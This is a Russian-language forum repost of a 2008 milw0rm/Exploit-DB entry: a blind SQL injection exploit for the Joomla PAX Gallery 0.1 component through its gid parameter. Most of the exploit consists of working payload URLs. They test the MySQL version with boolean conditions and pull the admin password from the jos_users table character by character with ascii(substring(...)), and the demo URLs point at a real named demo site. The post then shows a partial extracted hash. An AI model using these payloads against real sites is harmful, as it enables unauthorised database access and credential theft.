Exploit Joomla! Component PAX Gallery 0.1 - Blind SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7587
Проверка EDB
  1. Пройдено
Автор
XADOS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-5811
Дата публикации
2008-12-28
Код:
[â– ]  Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability
 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> Note: safe mode = ON
> Autor script: Tobias Floery
>---------------------------------------<
 

[â– ] ExPL0iT:


|: http://www.example.com/path/com_paxgallery&task=table&gid=[$qL] 


[■] D£M0: 

>Version:

|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5  [Ye$]
 
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo]
 
 
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100
 
d8e423..ecc... ;-)
 
[â– ] Th4nKs::
 
\> Str0ke </ \> Securitycode Team </ \> StaKer </

# milw0rm.com [2008-12-28]
 
Источник
www.exploit-db.com

Похожие темы